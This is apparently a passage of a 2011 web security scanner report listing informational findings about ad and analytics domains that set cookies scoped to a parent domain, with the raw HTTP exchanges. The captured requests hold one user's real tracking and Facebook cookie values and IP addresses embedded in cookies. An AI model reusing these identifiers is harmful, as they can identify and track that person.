Set-Cookie:PRcr=|GBLt:2|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FADRGBLt:2|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

12.10. http://api.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 24 Jun 2011 06:48:10 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma:
X-FB-Rev: 396710
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.27.247.105
X-Cnection: close
Date: Fri, 24 Jun 2011 13:46:10 GMT
Content-Length: 251

fb_sharepro_render([{"url":"http:\/\/www.ea.com\/1\/product-eulas","normalized_url":"http:\/\/www.ea.com\/1\/product-eulas","share_count":7,"like_count":0,"comment_count":0,"total_count":7,"click_coun
...[SNIP]...

12.11. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1308922027.341,wait-%3E10000,&1308922029900 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.12. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=176708751&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Farticle.wn.com%252Fview%252F2011%252F02%252F08%252FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%252F%26jsref%3D%26rnd%3D1308922054552&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&jsref=&rnd=1308922054552
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:27:33 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:27:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.13. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=208147318&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fsourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%26ad%3D6429295350%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D&d.r=http%3A%2F%2Fwww.pogo.com%2Flogin%2Fentry.jsp%3Fsl%3D1%26site%3Dpogo%26redr%3Dhttp%253A%252F%252Fwww.pogo.com%252Fpogo-online-games%252Flp-GeneralPogo-withoutFB.jsp%253Fad%253D6429295350%2526sourceid%253Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%2526kw%253Dfree%252Binternet%252Bgames%2526site HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:30:36 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:30:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.14. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=242390407&c4=206438376&c5=1&c6=14&c7=tue%20may%2017%2020%3A12%3A51%202011&c8=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&c9=GDN%3A%2040%25%20of%20Internet%20Users%20Play%20Casual%20Games%20Says%20Spil&c10=&c15=&1308922008562 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; UID=4a757a7-24.143.206.42-1305663172; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:59 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Sun, 23-Jun-2013 13:30:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.15. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: V and pb_rtb_ev, set with Domain=.contextweb.com by bh.contextweb.com, so they are sent to every host under contextweb.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 17:04:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Sat, 23-Jun-2012 17:04:27 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 17:04:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.16. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: V and cwbh1, set with Domain=.contextweb.com by bh.contextweb.com, so they are sent to every host under contextweb.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.17. http://ce.lijit.com/merge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ljtrtb, set with domain=.lijit.com by ce.lijit.com, so it is sent to every host under lijit.com. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=269d9846e9d950257f8d2f16e66681e2; tpro=eJxVUdtuhSAQ%2FJd9JmYRL9Xf6ONJQwiikigY0CaN8d%2B7YM457dvsMjM7oydswY92MdCfMBk3mJDQqtIGi5bBaJ6DuBioKTOF5CWtGHBC7Y0%2BpKgyrWIgall1aajIoUa5LUdMI%2B%2FIIyidTbQ6NPScTMcg1ZpdVLTKZTTbuGXg9zmFQlLq2S5DMC6pnU%2BGHcl%2FTPbG5G2d9mt2RynwXlMclA0%2BszUoOd5TTbHxna4s0w2%2FLOZu6bzLxavmzxqLmm5OQQ0y6jlfEBfpot1TjseZEfTwufmwR6BOO7UU2HZN2ZXNxV6MUbloBzMUlPkfTzQ1v75e1el%2F7Da1er8yWP0gtT8ciUoG3yZE6%2BnDAC8QrusXAdOE%2Fw%3D%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n28 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sat, 25 Jun 2011 17:04:28 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslJyNXYzNnJyMTB1tHBxcTNxMTUzMXMxtzQzMTCwsHBSqgUAqREIvw%3D%3D; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_tprdbex7Ex7Ctcbtcgxxrt, set with Domain=.2o7.net by eacustomerservice.112.2o7.net, so it is sent to every host under 2o7.net. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A13%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=View%20Answer&pidt=1&oid=http%3A//support.ea.com/app/ask&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
